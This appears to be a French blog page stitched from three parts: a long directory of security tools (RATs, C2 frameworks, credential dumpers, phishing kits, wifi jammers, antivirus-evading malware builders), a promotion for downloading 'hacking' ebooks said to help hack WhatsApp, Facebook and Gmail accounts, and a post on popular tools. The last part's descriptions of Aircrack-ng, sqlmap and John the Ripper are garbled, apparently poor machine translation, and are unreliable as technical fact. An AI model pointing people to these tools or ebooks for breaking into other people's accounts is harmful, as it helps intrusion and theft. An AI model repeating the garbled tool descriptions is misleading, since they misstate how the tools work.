  • Koadic - Koadic C3 COM Command & Control - JScript RAT.
  • Mallory - HTTP/HTTPS proxy over SSH.
  • Mimikatz - A little tool to play with Windows security.
  • Mimikittenz - A post-exploitation powershell tool for extracting juicy info from memory.
  • NoPowerShell - PowerShell rebuilt in C# for Red Teaming purposes.
  • Orc - A post-exploitation framework for Linux written in Bash.
  • P0wnedShell - PowerShell Runspace Post Exploitation Toolkit.
  • PacketWhisper - Stealthily Transfer Data & Defeat Attribution Using DNS Queries & Text-Based Steganography, without the need for attacker-controlled Name Servers or domains; Evade DLP/MLS Devices; Defeat Data- & DNS Name Server Whitelisting Controls. Convert any file type (e.g. executables, Office, Zip, images) into a list of Fully Qualified Domain Names (FQDNs), use DNS queries to transfer data. Simple yet extremely effective.
  • Paragon - Plate-forme d'engagement de l'équipe rouge dans le but d'unifier les outils offensifs derrière une interface utilisateur simple.
  • Pivoter - Un outil proxy pour les pentesters pour avoir un mouvement latéral plus facile.
  • Poète - Outil de post-exploitation.
  • PoshC2 - Un cadre C2 conscient de proxy utilisé pour aider les équipes rouges avec la post-exploitation et le mouvement latéral.
  • PowerOPS - Outil de post-exploitation portable PowerShell Runspace destiné à faciliter les tests de pénétration avec PowerShell.
  • ProcessHider - Outil de post-exploitation pour masquer les processus des applications de surveillance.
  • Pupy - Un outil d'administration à distance et de post-exploitation multiplateforme open source (Windows, Linux, OSX, Android) principalement écrit en python.
  • Pwnat - Perfore les trous dans les pare-feu et les NAT, permettant à n'importe quel nombre de clients derrière les NAT de se connecter directement à un serveur derrière un NAT différent.
  • Pypykatz - Implémentation de Mimikatz en Python pur.
  • RedGhost - Framework de post-exploitation Linux écrit en bash conçu pour aider les équipes rouges dans la persistance, la reconnaissance, l'escalade de privilèges et ne laissant aucune trace.
  • RemoteRecon - Reconnaissance et collecte à distance.
  • RottenPotatoNG - Nouvelle version de RottenPotato en tant que DLL C ++ et binaire C ++ autonome - pas besoin de meterpreter ou d'autres outils.
  • SafetyKatz - SafetyKatz est une combinaison d'une version légèrement modifiée du projet Mimikatz de @ gentilkiwi et de .NET PE Load de @ subTee.
  • SharpC2 - Cadre de commande et de contrôle .NET
  • SocksOverRDP - Prise en charge du proxy Socks5 / 4 / 4a pour Remote Desktop Protocol / Terminal Services.
  • SpYDyishai - Un récolteur d'informations d'identification Gmail.
  • SprayWMI - Un moyen facile d'obtenir des obus de masse sur des systèmes qui prennent en charge WMI. Beaucoup plus efficace que PSEXEC car il ne laisse pas de restes sur un système.
  • Tgcd - Un utilitaire réseau Unix simple pour étendre l'accessibilité des services réseau basés sur TCP / IP au-delà des pare-feu.
  • TheFatRat - Un outil simple pour générer une porte dérobée avec msfvenom (une partie du framework metasploit). Cet outil compile un malware avec une charge utile populaire, puis le malware compilé peut être exécuté sur Windows, Android, Mac. Les logiciels malveillants créés avec cet outil ont également la capacité de contourner la plupart des logiciels antivirus.
  • WCE - Windows Credentials Editor (WCE) est un outil de sécurité pour répertorier les sessions d'ouverture de session et ajouter, modifier, répertorier et supprimer les informations d'identification associées.
  • Belette - Implant de canal secret DNS pour les équipes rouges.

Rapports

  • Cartographie - Un outil Python qui consolide les actifs d'infrastructure et les relations entre eux dans une vue graphique intuitive alimentée par une base de données Neo4j.
  • DefectDojo - Un outil de corrélation de vulnérabilité et d'orchestration de la sécurité des applications open source.
  • Dradis - Collaboration et reporting pour les équipes de sécurité informatique.
  • Faraday - Plateforme collaborative de test de pénétration et de gestion de la vulnérabilité.
  • VECTR - Un outil qui facilite le suivi des activités de test de votre équipe rouge et bleue pour mesurer les capacités de détection et de prévention dans différents scénarios d'attaque.

Prestations de service

  • SSLyze - Scanner de configuration SSL.
  • Sslstrip - Une démonstration des attaques de décapage HTTPS.
  • Sslstrip2 - Version SSLStrip pour vaincre HSTS.
  • Tls_prober - Empreinte digitale de l'implémentation SSL / TLS d'un serveur.

Formation

  • Android-InsecureBankv2 - Vulnerable Android application for developers and security enthusiasts to learn about Android insecurities.
  • BadBlood - Fills a Microsoft Active Directory Domain with a structure and thousands of objects. The output of the tool is a domain similar to a domain in the real world. After BadBlood is ran on a domain, security analysts and engineers can practice using tools to gain an understanding and prescribe to securing Active Directory.
  • DIVA Android - Damn Insecure and vulnerable App for Android.
  • DVCP-TE - Damn Vulnerable Chemical Process - Tennessee Eastman.
  • DVWA - Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable.
  • DVWS - Damn Vulnerable Web Sockets (DVWS) is a vulnerable web application which works on web sockets for client-server communication.
  • Don't Panic - Training linux bind shell with anti-reverse engineering techniques.
  • Hackazon - A modern vulnerable web app.
  • Insecure-deserialization-net-poc - A small webserver vulnerable to insecure deserialization.
  • OWASP Juice Shop - An intentionally insecure webapp for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws.
  • OWASP NodeGoat - An environment to learn how OWASP Top 10 security risks apply to web applications developed using Node.js and how to effectively address them.
  • OWASP Railsgoat - A vulnerable version of Rails that follows the OWASP Top 10.
  • OWASP Security Shepherd - A web and mobile application security training platform.
  • OWASP WebGoat - A deliberately insecure Web Application.
  • RopeyTasks - Deliberately vulnerable web application.
  • Sadcloud - A tool for standing up (and tearing down!) purposefully insecure cloud infrastructure.
  • Sqli-labs - SQLI labs to test error based, Blind boolean based, Time based.
  • WackoPicko - A vulnerable web application used to test web application vulnerability scanners.
  • Xvwa - XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security.

Web

  • Arachni - Web Application Security Scanner Framework.
  • Argumentinjectionhammer - A Burp Extension designed to identify argument injection vulnerabilities.
  • BlackBox Protobuf Burp Extension - A Burp Suite extension for decoding and modifying arbitrary protobuf messages without the protobuf type definition.
  • BlindElephant - Web Application Fingerprinter.
  • Brosec - An interactive reference tool to help security professionals utilize useful payloads and commands.
  • Burp Suite - An integrated platform for performing security testing of web applications.
  • CloudScraper - Tool to enumerate targets in search of cloud resources. S3 Buckets, Azure Blobs, Digital Ocean Storage Space.
  • Cms-explorer - CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running.
  • Dvcs-ripper - Rip web accessible (distributed) version control systems.
  • Fimap - Find, prepare, audit, exploit and even google automatically for LFI/RFI bugs.
  • Gobuster - Directory/file & DNS busting tool written in Go.
  • Jok3r - Network and Web Pentest Framework.
  • Joomscan - Joomla CMS scanner.
  • Jwt_tool - A toolkit for testing, tweaking and cracking JSON Web Tokens.
  • Kadabra - Automatic LFI Exploiter and Scanner, written in C++ and a couple extern module in Python.
  • Kadimus - LFI scan and exploit tool.
  • Liffy - LFI exploitation tool.
  • LinkFinder - A python script that finds endpoints in JavaScript files.
  • Netsparker - Web Application Security Scanner.
  • Nikto2 - Web application vulnerability scanner.
  • NoSQLMap - Automated Mongo database and NoSQL web application exploitation tool.
  • OWASP Xenotix - XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework.
  • Paros - A Java based HTTP/HTTPS proxy for assessing web application vulnerability.
  • PayloadsAllTheThings - A list of useful payloads and bypass for Web Application Security and Pentest/CTF.
  • Ratproxy - A semi-automated, largely passive web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems.
  • RecurseBuster - Rapid content discovery tool for recursively querying webservers, handy in pentesting and web application assessments.
  • Relative-url-extractor - A small tool that extracts relative URLs from a file.
  • SQLMap - Automatic SQL injection and database takeover tool.
  • SQLNinja - SQL Server injection & takeover tool.
  • Scout2 - Security auditing tool for AWS environments.
  • Skipfish - An active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes.
  • TPLMap - Automatic Server-Side Template Injection Detection and Exploitation Tool.
  • Tracy - A tool designed to assist with finding all sinks and sources of a web application and display these results in a digestible manner.
  • W3af - Web application attack and audit framework.
  • WPScan - WPScan is a black box WordPress vulnerability scanner.
  • WPSploit - Exploiting Wordpress With Metasploit.
  • WS-Attacker - A modular framework for web services penetration testing.
  • WStalker - An easy proxy.
  • Wapiti - Web application vulnerability scanner.
  • Wappalyzer - Cross-platform utility that uncovers the technologies used on websites.
  • Weevely3 - Weaponized web shell.
  • Wfuzz - Web application fuzzer.
  • WhatWeb - Website Fingerprinter.
  • Wordpress Exploit Framework - A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
  • Wuzz - Interactive cli tool for HTTP inspection
  • XSS-keylogger - A keystroke logger to exploit XSS vulnerabilities in a site.
  • XSS-payload-list - XSS Payload list.
  • Yasuo - A ruby script that scans for vulnerable & exploitable 3rd-party web applications on a network.
  • Zed Attack Proxy (ZAP) - The OWASP ZAP core project.

Wireless

  • Aircrack-ng - An 802.11 WEP and WPA-PSK keys cracking program.
  • Airgeddon - This is a multi-use bash script for Linux systems to audit wireless networks.
  • Kismet - Wireless network detector, sniffer, and IDS.
  • Krackattacks-scripts - Scripts to test if clients or access points (APs) are affected by the KRACK attack against WPA2.
  • LANs.py - Inject code, jam wifi, and spy on wifi users.
  • Mass-deauth - A script for 802.11 mass-deauthentication.
  • Reaver - Brute force attack against Wifi Protected Setup.
  • Sniffle - A sniffer for Bluetooth 5 and 4.x (LE) using TI CC1352/CC26x2 hardware.
  • WiFiDuck - Wireless keystroke injection attack platform.
  • Wifijammer - Continuously jam all wifi clients/routers.
  • Wifikill - A python program to kick people off of wifi.
  • Wifiphisher - Automated phishing attacks against Wi-Fi networks.
  • Wifite - Automated wireless attack tool.

Reverse Engineering

  • AndBug - A debugger targeting the Android platform's Dalvik virtual machine intended for reverse engineers and developers.
  • Angr - A platform-agnostic binary analysis framework developed by the Computer Security Lab at UC Santa Barbara and their associated CTF team, Shellphish.
  • Apk2Gold - Yet another Android decompiler.
  • ApkTool - A tool for reverse engineering Android apk files.
  • Avscript - Avast JavaScript Interactive Shell.
  • B2R2 - A collection of useful algorithms, functions, and tools for binary analysis.
  • Barf - Binary Analysis and Reverse engineering Framework.
  • BinText - A small, very fast and powerful text extractor.
  • BinWalk - Analyze, reverse engineer, and extract firmware images.
  • Binaryanalysis-ng - Binary Analysis Next Generation is a framework for unpacking files (like firmware) recursively and running checks on the unpacked files. Its intended use is to be able to find out the provenance of the unpacked files and classify/label files, making them available for further analysis.
  • Binee - A complete binary emulation environment that focuses on introspection of all IO operations.
  • Boomerang - Decompile x86/SPARC/PowerPC/ST-20 binaries to C.
  • Bytecode-viewer - A Java 8 Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More).
  • Bytecode_graph - Module designed to modify Python bytecode. Allows instructions to be added or removed from a Python bytecode string.
  • CHIPSEC - Platform Security Assessment Framework.
  • Capstone - Lightweight multi-platform, multi-architecture disassembly framework with Python bindings.
  • ClassNameDeobfuscator - Simple script to parse through the .smali files produced by apktool and extract the .source annotation lines.
  • Coda - Coredump analyzer.
  • Ctf_import - Run basic functions from stripped binaries cross platform.
  • Dex2jar - Tools to work with android .dex and java .class files.
  • Distorm - Powerful Disassembler Library For x86/AMD64.
  • DotPeek - A free-of-charge .NET decompiler from JetBrains.
  • Dotnet-netrace - Collects network traces of .NET applications.
  • Dragondance - Binary code coverage visualizer plugin for Ghidra.
  • Dwarf - A gui for mobile reverse engineers, crackers and security analyst. Or damn, what a reversed fluffy or yet, duck warrios are rich as fuck. Whatever you like! Built on top of pyqt5, frida and some terrible code.
  • DynStruct - Reverse engineering tool for automatic structure recovering and memory use analysis based on DynamoRIO and Capstone.
  • EFI DXE Emulator - An EFI DXE phase binaries emulator based on Unicorn.
  • Edb - A cross platform x86/x86-64 debugger.
  • Enjarify - A tool for translating Dalvik bytecode to equivalent Java bytecode. This allows Java analysis tools to analyze Android applications.
  • Fibratus - Tool for exploration and tracing of the Windows kernel.
  • Fino - An Android Dynamic Analysis Tool.
  • Flare-ida - IDA Pro utilities from FLARE team.
  • Frida - Inject JavaScript to explore native apps on Windows, macOS, Linux, iOS, Android, and QNX.
  • Frida-scripts - These scripts will help in security research and automation.
  • GEF - Multi-Architecture GDB Enhanced Features for Exploiters & Reverse-Engineers.
  • Gdb-dashboard - Modular visual interface for GDB in Python.
  • Gdbstub - A simple, dependency-free GDB stub that can be easily dropped in to your project.
  • Ghidra - A software reverse engineering (SRE) framework.
  • Ghidra_scripts - Scripts for the Ghidra software reverse engineering suite.
  • Granary - A kernel space dynamic binary translation framework. The main goal of Granary is to enable flexible and efficient instrumentation of Linux kernel modules, while imposing no overhead to non-module kernel code.
  • Grap - Define and match graph patterns within binaries.
  • Haybale - Symbolic execution of LLVM IR with an engine written in Rust.
  • Heap-viewer - An IDA Pro plugin to examine the glibc heap, focused on exploit development.
  • HexRaysCodeXplorer - Hex-Rays Decompiler plugin for better code navigation
  • Hopper - A OS X and Linux Disassembler/Decompiler for 32/64 bit Windows/Mac/Linux/iOS executables.
  • IDA Free - The freeware version of IDA.
  • IDA Patcher - IDA Patcher is a plugin for Hex-Ray's IDA Pro disassembler designed to enhance IDA's ability to patch binary files and memory.
  • IDA Pomidor - IDA Pomidor is a plugin for Hex-Ray's IDA Pro disassembler that will help you retain concentration and productivity during long reversing sessions.
  • IDA Pro - A Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger.
  • IDA Sploiter - IDA Sploiter is a plugin for Hex-Ray's IDA Pro disassembler designed to enhance IDA's capabilities as an exploit development and vulnerability research tool.
  • IDAPython - An IDA plugin which makes it possible to write scripts for IDA in the Python programming language.
  • IDAwasm - IDA Pro loader and processor modules for WebAssembly.
  • IRPMon - The goal of the tool is to monitor requests received by selected device objects or kernel drivers. The tool is quite similar to IrpTracker but has several enhancements. It supports 64-bit versions of Windows (no inline hooks are used, only modifications to driver object structures are performed) and monitors IRP, FastIo, AddDevice, DriverUnload and StartIo requests.
  • Idaemu - Is an IDA Pro Plugin, use for emulating code in IDA Pro.
  • Immunity Debugger - A powerful new way to write exploits and analyze malware.
  • JAD - JAD Java Decompiler.
  • JD-GUI - Aims to develop tools in order to decompile and analyze Java 5 “byte code” and the later versions.
  • Jadx - Decompile Android files.
  • Keystone Engine - A lightweight multi-platform, multi-architecture assembler framework.
  • Krakatau - Java decompiler, assembler, and disassembler.
  • Levitate - Reverse Engineering and Static Malware Analysis Platform.
  • MARA Framework - A Mobile Application Reverse engineering and Analysis Framework.
  • Manticore - Prototyping tool for dynamic binary analysis, with support for symbolic execution, taint analysis, and binary instrumentation.
  • Medusa - A disassembler designed to be both modular and interactive.
  • MegaDumper - Dump native and .NET assemblies.
  • Minhook - The Minimalistic x86/x64 API Hooking Library for Windows.
  • Mona.py - PyCommand for Immunity Debugger that replaces and improves on pvefindaddr.
  • OllyDbg - An x86 debugger that emphasizes binary code analysis.
  • PEDA - Python Exploit Development Assistance for GDB.
  • Paimei - Reverse engineering framework, includes PyDBG, PIDA, pGRAPH.
  • Pigaios - A tool for matching and diffing source codes directly against binaries.
  • Plasma - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.
  • Ponce - An IDA Pro plugin that provides users the ability to perform taint analysis and symbolic execution over binaries in an easy and intuitive fashion. With Ponce you are one click away from getting all the power from cutting edge symbolic execution. Entirely written in C/C++.
  • Procyon - A modern open-source Java decompiler.
  • Protobuf-inspector - Tool to reverse-engineer Protocol Buffers with unknown definition.
  • Pwndbg - Exploit Development and Reverse Engineering with GDB Made Easy.
  • Pyew - Command line hexadecimal editor and disassembler, mainly to analyze malware.
  • QBDI - A Dynamic Binary Instrumentation framework based on LLVM.
  • Qira - QEMU Interactive Runtime Analyser.
  • R2MSDN - R2 plugin to add MSDN documentation URLs and parameter names to imported function calls.
  • RABCDAsm - Robust ABC (ActionScript Bytecode) [Dis-]Assembler.
  • Radare2 - Opensource, crossplatform reverse engineering framework.
  • Radare2-bindings - Bindings of the r2 api for Valabind and friends.
  • Redexer - A reengineering tool that manipulates Android app binaries.
  • ScratchABit - Easily retargetable and hackable interactive disassembler with IDAPython-compatible plugin API.
  • Shed - .NET runtime inspector.
  • Simplify - Generic Android Deobfuscator.
  • SimplifyGraph - IDA Pro plugin to assist with complex graphs.
  • Smali - Smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation.
  • Swiffas - SWF parser and AVM2 (Actionscript 3) bytecode parser.
  • Swift-frida - Frida library for interacting with Swift programs.
  • Toolbag - The IDA Toolbag is a plugin providing supplemental functionality to Hex-Rays IDA Pro disassembler.
  • Triton - Triton is a Dynamic Binary Analysis (DBA) framework. It provides internal components like a Dynamic Symbolic Execution (DSE) engine, a dynamic taint engine, AST representations of the x86, x86-64, ARM32 and AArch64 Instructions Set Architecture (ISA), SMT simplification passes, an SMT solver interface and, the last but not least, Python bindings.
  • UPX - The Ultimate Packer pour eXecutables.
  • Ufgraph - Un script simple qui analyse la sortie de la commande uf (fonction de désassemblage) dans windbg et utilise graphviz pour générer un graphique de flux de contrôle au format PNG / SVG / PDF / GIF (voir l'option -of) et l'affiche.
  • Décompiler - Décompiler les binaires Python 2.7 (.pyc).
  • Unicorn Engine - Un framework d'émulateur CPU léger, multi-plateforme et multi-architecture basé sur QEMU.
  • Unlinker - Unlinker est un outil qui peut extraire des fonctions des binaires compilés Visual C ++ et produire des fichiers d'objets COFF Visual C ++.
  • Plugin VT-IDA - Plugin VirusTotal officiel pour IDA Pro.
  • Voltron - Une boîte à outils d'interface utilisateur de débogueur extensible écrite en Python. Il vise à améliorer l'expérience utilisateur de différents débogueurs (LLDB, GDB, VDB et WinDbg) en permettant la connexion de vues d'utilitaires qui peuvent récupérer et afficher des données à partir de l'hôte du débogueur.
  • WinDbg - Kit de pilotes Windows et WinDbg.
  • WinHex - Un éditeur hexadécimal, utile dans le domaine de la criminalistique informatique, de la récupération de données, du traitement de données de bas niveau et de la sécurité informatique.
  • WinIPT - La bibliothèque Windows pour Intel Process Trace (WinIPT) est un projet qui exploite la nouvelle fonctionnalité Intel Processor Trace exposée par Windows 10 Redstone 5 (1809), via un ensemble de bibliothèques et un outil en ligne de commande.
  • X64_dbg - Un débogueur open-source x64 / x32 pour Windows.
  • Xxxswf - Un script Python pour analyser les fichiers Flash.
  • YaCo - Un plugin IDA Hex-Rays. Lorsqu'il est activé, plusieurs utilisateurs peuvent travailler simultanément sur le même binaire. Toute modification effectuée par un utilisateur est synchronisée via le contrôle de version git.
  • uEmu - Petit plugin d' émulation mignon pour IDA basé sur la licorne.

Sécurité

Sécurité du cloud

  • Aws-nuke - Nuke un compte AWS entier et supprimez toutes ses ressources.
  • Azucar - Outil d'audit de sécurité pour les environnements Azure.
  • CloudMapper - CloudMapper vous aide à analyser vos environnements Amazon Web Services (AWS).
  • Hammer - Dow Jones Hammer: Protégez le cloud avec la puissance du cloud (AWS).
  • Panther - Un SIEM natif du cloud pour l'équipe de sécurité moderne
  • Parlement - Une bibliothèque de charpie AWS IAM. Il examine les politiques à la recherche de problèmes.
  • Security Monkey - Security Monkey surveille les organisations AWS, GCP, OpenStack et GitHub pour les actifs et leurs modifications au fil du temps.
  • s3cr3t - Servir des fichiers en toute sécurité à partir d'un compartiment S3 avec des liens expirants et d'autres restrictions.

Sécurité des terminaux

  • AIDE - Advanced Intrusion Detection Environment est un vérificateur d'intégrité de fichiers et de répertoires.
  • Duckhunt - Empêche les attaques de RubberDucky (ou autre injection de frappe).
  • Hardentools - Un utilitaire qui désactive un certain nombre de fonctionnalités Windows risquées.
  • Lynis - Outil d'audit de sécurité pour les systèmes Linux, macOS et UNIX. Aide aux tests de conformité (HIPAA / ISO27001 / PCI DSS) et au durcissement du système. Sans agent et installation facultative.
  • Osx-config-check - Vérifiez la configuration de votre machine OS X.
  • Xnumon - Surveillez macOS pour détecter toute activité malveillante.

Hameçonnage

  • Miteru - Un outil de détection de kit de phishing expérimental.
  • StreamingPhish - Utilitaire basé sur Python qui utilise l'apprentissage automatique supervisé pour détecter les domaines de phishing du réseau de journaux de transparence des certificats.

Intimité

  • Git-crypt - Cryptage transparent des fichiers dans git.
  • GoSecure - Un système de réseau privé virtuel (VPN) facile à utiliser et portable construit avec Linux et un Raspberry Pi.
  • I2P - Le projet Internet invisible.
  • Nipe - Un script pour faire de Tor Network votre passerelle par défaut.
  • SecureDrop - Système de soumission de dénonciateurs open source que les organisations médiatiques peuvent utiliser pour accepter en toute sécurité des documents provenant de sources anonymes et communiquer avec elles.
  • Sshuttle - Serveur proxy transparent qui fonctionne comme le VPN d'un pauvre. Avance sur ssh. Ne nécessite pas d'administrateur. Fonctionne avec Linux et MacOS. Prend en charge la tunnellisation DNS.
  • Tomb - Un outil en ligne de commande minimaliste pour gérer les volumes chiffrés, alias The Crypto Undertaker.
  • Tor - Le logiciel gratuit permettant d'activer l'anonymat en ligne du routage des oignons.
  • Toriptables2 - Une alternative de script python à Nipe. Fait de Tor Network votre passerelle par défaut.

Ingénierie sociale

Cadre

  • SET - Le Social-Engineer Toolkit de TrustedSec.

Harvester

  • Creepy - Un outil OSINT de géolocalisation.
  • Datasploit - Un outil pour effectuer diverses techniques OSINT, agréger toutes les données brutes, les visualiser sur un tableau de bord et faciliter l'alerte et la surveillance des données.
  • Email-enum - Recherche les sites Web traditionnels et vous indique si un e-mail est enregistré.
  • Github-dorks - Outil CLI pour analyser les référentiels / organisations github pour une fuite potentielle d'informations sensibles.
  • Maltego - Logiciel propriétaire pour l'intelligence open source et la criminalistique, de Paterva.
  • Metagoofil - Récolteuse de métadonnées.
  • SpiderFoot - Automatise la collecte OSINT afin que vous puissiez vous concentrer sur l'analyse.
  • TTSL - Outil pour gratter LinkedIn.
  • TheHarvester - E-mail, sous-domaine et récolteuse de noms de personnes.

Hameçonnage

  • BlackPhish - Super léger avec de nombreuses fonctionnalités et des vitesses ultra -rapides.
  • Blackeye - L'outil de phishing le plus complet, avec 32 modèles +1 personnalisables.
  • CredSniper - Un framework de phishing écrit avec le micro-framework Python Flask et le modèle Jinja2 qui prend en charge la capture de jetons 2FA.
  • FiercePhish - Un cadre de phishing à part entière pour gérer tous les engagements de phishing. Il vous permet de suivre des campagnes de phishing distinctes, de planifier l'envoi d'e-mails et bien plus encore.
  • GoPhish - Gophish est une boîte à outils de phishing open source conçue pour les entreprises et les testeurs de pénétration. Il offre la possibilité de configurer et d'exécuter rapidement et facilement des engagements de phishing et une formation de sensibilisation à la sécurité.
  • Lockphish - Lockphish est le premier outil pour les attaques de phishing sur l'écran de verrouillage, conçu pour récupérer les informations d'identification Windows, le code PIN Android et le mot de passe iPhone en utilisant un lien https.
  • Modlishka - Proxy inverse. Phishing NG.
  • Phishing-frenzy - Ruby on Rails Phishing Framework.
  • Pompa - Boîte à outils de spear phishing complète - front-end web.
  • Phishing Whatsapp - Le meilleur outil pour le phishing Whatsapp avec le fournisseur otp.

Wardialing


Ebook’s  FREE  Collection (FuLL))

50 Hacking EBooks PDF Téléchargement gratuit pour le piratage éthique

Dans cette liste, vous pouvez trouver tous les types de livres de piratage pour savoir comment pirater, déchiffrer un mot de passe, piratage WiFi et piratage de sites Web et toutes autres choses de piratage.Ces livres sont très utiles pour un débutant.Avec ces livres, vous apprendrez facilement les bases de piratage éthique.

Tous les livres sont basés sur des tutoriels de piratage éthiques, pas pour le piratage.Tous les livres sont en PDF, vous pouvez donc les lire facilement.

  1. Hacking de ceinture noire et livre de hacking complet
  2. Hackers High School 13 Ebooks de piratage complets
  3. Test de pénétration avec Backtrack 5
  4. Un guide pour les débutants de piratage de systèmes informatiques
  5. Livre noir des virus et du piratage
  6. Les secrets des super et des hackers professionnels
  7. Base de données et attaques dangereuses de piratage de Google
  8. Attaque par déni de service avancé par Internet (DDOS)
  9. Piratage informatique et attaques de logiciels malveillants pour les nuls
  10. G-mail Advance Hacking Guides and Tutorials
  11. Exploit de vulnérabilité et piratage de site Web pour les nuls
  12. Piratage d'applications Web (Manuel des pirates)
  13. Réseaux de cryptage de sécurité et piratage
  14. Botnets The Killer Web Applications Hacking
  15. Test d'attaques et d'exemples de piratage
  16. Piratage de réseau et piratage d'ombres
  17. Gray Hat Hacking et Guide complet de piratage
  18. Didacticiels avancés de piratage exposés
  19. 501 Secrets de piratage de sites Web
  20. Technologie de sécurité Internet et piratage
  21. Guide d'étude du pirate éthique certifié CEH
  22. Piratage par injection SQL avancé et guide
  23. Tests de piratage et de pénétration Web
  24. Tutoriels de piratage OWASP et protection des applications Web
  25. CEH - Hacking Database Secrets and Exploit
  26. Tests de valeur de piratage éthique et de pénétration
  27. Pirater n'importe quel site Web, pirater une application Web complète
  28. Pirates débutants et tutoriels
  29. Ethical Hacking Complete E-book pour les débutants
  30. Backtrack: Tutoriels de piratage avancé
  31. Attaques par injection SQL et tutoriels par Exploit-DB
  32. Exploitation de vulnérabilités XSS + et piratage de sites Web
  33. Guide ultime des attaques de dynamisation sociale
  34. White Hat Hacking guide complet des attaques XSS
  35. Sites Web de Cross Site Scripting et Hacking
  36. The Hackers Underground Handbook (pirater le système)
  37. Tutoriels d'injection SQL aveugle et piratage
  38. Hacking Secrets Revealed
  39. Piratage de la base de données du site Web et des systèmes propriétaires
  40. Ingénierie inverse pour les débutants
  41. Ingénierie inverse (le vrai piratage)
  42. Piratage informatique
  43. Piratez votre ami en utilisant Backtrack
  44. Rétro-ingénierie Hacking et Cracking
  45. Pirater le système pour les débutants
  46. Piratage de systèmes informatiques
  47. Découverte et exploitation d'injection SQL aveugle

Ici, je vous donne quelques livres gratuits de piratage éthique PDF Collection.These tous les livres sont en hindi.

Meilleures astuces de piratage éthique ebook et pdf

 

Astuces et secrets pour Windows

Guide de piratage

Programmation de fichiers batch

Dégradation de sites Web Un processus étape par étape par FTP Exploits

Dos attaqué

Explication des algorithmes de chiffrement

Suivi IP, DNS, WHOIS-nsLOOKUP

Transparent_proxies_with_Squid_hackingtruths_box_sk_Proxy_Servers

Vérités !!! - Ce qu'ils n'enseignent pas dans les manuels !!!

Encodage Base64 déchiré

Explication des algorithmes

Fermeture des trous ouverts

pare-feu

Exploits FTP

Collecte d'informations sur l'hôte distant

Obtention d'informations géographiques à l'aide d'une adresse IP

Piratage sous Linux

Plus de craquage de mot de passe déchiffré

Suppression de bannières de votre site

Sendmail et au-delà

SSL déchiré

TCP Wrappers Unwrapped

Proxys transparents dans Squid

Astuces et secrets Windows incalculables

Fichiers de mot de passe Windows déchirés

Télécharger tous ces livres à partir de ce lien

TELECHARGER TOUS LES LIVRES

Ces livres peuvent vous aider pour le piratage de WhatsApp, le piratage de Facebook, le piratage de Gmail, les applications Android et le piratage de sites Web, etc.


Outils de piratage les plus populaires

Publié: 21 novembre 2016 dans Tech hacks

9

 

 

 

 

 

 

6 Votes

Le langage de codage le plus populaire au monde se trouve être le plus ...

Si le piratage est effectué pour identifier les menaces potentielles sur un ordinateur ou un réseau, il s'agira d'un piratage éthique.

Le piratage éthique est également appelé test de pénétration, test d'intrusion et équipe rouge.

Le piratage est le processus d'accès à un système informatique dans l'intention de fraude, de vol de données et d'atteinte à la vie privée, etc., en identifiant ses faiblesses.

Nous avons compilé certains des outils de test d'intrusion les plus populaires pour vous aider à traverser les premières étapes d'une enquête de sécurité. Vous trouverez certains des outils classiques qui semblent exister depuis toujours et de nouveaux outils qui ne sont peut-être pas familiers.

Téléchargez l'application Spyboy

Obtenez le sur Google Play

1.  Aircrack-ng

Aircrack-ng

Aircrack-ng.org est un programme de rupture de clés 802.11 WEP et WPA-PSK qui peut résoudre les clés une fois suffisamment d'informations concernant le terme volé. Il exécute l'attaque FMS standard à côté de quelques améliorations comme la violation de KoreK et en plus la toute nouvelle attaque PTW, rendant ainsi l'assaut beaucoup plus rapide en contraste avec d'autres dispositifs de division WEP. En fait, Aircrack-ng est un arrangement de logiciel pour évaluer des systèmes distants.

2.  sqlmap

sqlmap

sqlmap est un dispositif de test d'infiltration open source qui a robotisé la procédure de reconnaissance et d'abus des imperfections d'infusion SQL et la prise de contrôle des serveurs de base de données. Prise en charge complète des systèmes de gestion de base de données MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB et HSQLDB .

Il accompagne un programme d'identification efficace, de nombreux éléments de coin pour un analyseur d'infiltration définitif et une vaste gamme de changements durables de l'empreinte digitale de la base de données, sur les informations allant de la base de données à l'accès au cadre d'enregistrement de base et à l'exécution des ordres sur le cadre de travail via réseau de bande.

3.  John The Ripper

John The Ripper

John the Ripper est un outil de craquage de mot de passe secret gratuit. Au début, il a été créé pour le cadre de travail Unix, il continue maintenant de fonctionner sur quinze étapes distinctes (dont onze construisent des adaptations particulières de conception d'Unix, DOS, Win32, BeOS et OpenVMS).

Il est l'un des projets de test et de rupture de mots-clés les plus courants, car il relie diverses plaquettes de mots secrets en un seul paquet, détecte automatiquement les types de hachage de mots-clés et intègre un ajustable. Il peut continuer à fonctionner contre différentes organisations de mots secrets brouillés, y compris quelques types de hachage de mots-clés de sépulcre les plus couramment trouvés sur différentes variantes Unix (en vue de DES, MD5 ou Blowfish), Kerberos AFS et Windows NT / 2000 / XP / 2003 LM hash . Des modules supplémentaires ont étendu sa capacité à incorporer des hachages de clé secrète basés sur MD4 et des mots de passe stockés dans LDAP, MySQL et autres.

4.  Nmap - Mappeur de réseau

Mappeur de réseau

Nmap est une contraction de «System Mapper», tout comme un dispositif de programmation open source gratuit exceptionnellement bien compris. Nmap est utilisé pour la divulgation du système et l'examen de la sécurité. De nombreux administrateurs de framework utilisent nmap pour le stock système, les ports ouverts, la supervision des calendriers de mise à jour de l'administration et l'observation du temps de disponibilité de l'hôte ou de l'administration.

L'appareil utilise des parcelles IP brutes dans le cadre d'approches innovantes pour déterminer quels hôtes sont accessibles sur le système, quelles administrations (nom et formulaire d'application) ces hôtes mettent en avant, quels cadres de travail (et rendus de système d'exploitation et correctifs imaginables) et quels le type et la forme des canaux / pare-feu groupés sont utilisés par l'objectif.

